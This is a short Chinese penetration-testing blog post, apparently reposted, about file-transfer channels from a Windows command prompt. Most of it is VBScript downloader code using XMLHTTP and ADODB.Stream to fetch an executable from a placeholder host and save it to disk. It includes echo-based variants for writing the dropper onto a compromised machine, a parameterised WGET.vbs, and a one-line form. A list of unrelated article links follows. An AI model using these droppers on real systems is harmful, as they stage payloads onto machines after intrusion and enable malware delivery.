• 渗透测试中的文件传输通道1- cmd下下载文件


    Set xPost = createObject("Microsoft.XMLHTTP")
    xPost.Open "GET","http://www.xx.com/dc.exe",0 '下载文件的地址
    xPost.Send()
    Set sGet = createObject("ADODB.Stream")
    sGet.Mode = 3
    sGet.Type = 1
    sGet.Open()
    sGet.Write(xPost.responseBody)
    sGet.SaveToFile "c:dc.exe",2 '保存文件的路径和文件名

    把以上代码保存在xx.vbs文件 执行cmd.exe xx.vbs

    使用ECHO方法写入
    echo Set xPost = createObject("Microsoft.XMLHTTP") >dc.vbs
    echo xPost.Open "GET",http://www.xxx.com/dc.exe,0 >>dc.vbs
    echo xPost.Send() >>dc.vbs
    echo Set sGet = createObject("ADODB.Stream") >>dc.vbs
    echo sGet.Mode = 3 >>dc.vbs
    echo sGet.Type = 1 >>dc.vbs
    echo sGet.Open() >>dc.vbs
    echo sGet.Write(xPost.responseBody) >>dc.vbs
    echo sGet.SaveToFile "c:dc.exe",2 >>dc.vbs

    ===================带参数的WGET.vbs==========
    on error resume next
    iLocal=LCase(Wscript.Arguments(1))
    iRemote=LCase(Wscript.Arguments(0))
    Set xPost=createObject("Microsoft.XMLHTTP")
    xPost.Open "GET",iRemote,0
    xPost.Send()
    set sGet=createObject("ADODB.Stream")
    sGet.Mode=3
    sGet.Type=1
    sGet.Open()
    sGet.Write xPost.ResponseBody
    sGet.SaveToFile iLocal,2
    ===================带参数的WGET.vbs==========

    ===================带参数的WGET.vbs==========
    echo on
    echo on error resume next >dc.vbs
    echo iLocal=LCase(Wscript.Arguments(1))>>dc.vbs
    echo iRemote=LCase(Wscript.Arguments(0))>>dc.vbs
    echo Set xPost=createObject("Microsoft.XMLHTTP")>>dc.vbs
    echo xPost.Open "GET",iRemote,0>>dc.vbs
    echo xPost.Send()>>dc.vbs
    echo set sGet=createObject("ADODB.Stream")>>dc.vbs
    echo sGet.Mode=3>>dc.vbs
    echo sGet.Type=1>>dc.vbs
    echo sGet.Open()>>dc.vbs
    echo sGet.Write xPost.ResponseBody>>dc.vbs
    echo sGet.SaveToFile iLocal,2>>dc.vbs
    echo off
    pasue
    ===================带参数的WGET.vbs==========

    1.iget.vbs一次写入
    在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写

    Set x= createObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2

    这样我们可以一次echo成功,echo版本:

    echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs

  • 相关阅读:
    密码等级
    ie兼容透明
    分割线
    支付宝银行判断接口
    date只能选择今天之后的时间js
    离开页面之前提示,关闭,刷新等
    使用 Linux 系统的常用命令
    C#窗体简单增删改查
    1
    二维数组
  • 原文地址:https://www.cnblogs.com/dongchi/p/4946992.html
Copyright © 2020-2023  润新知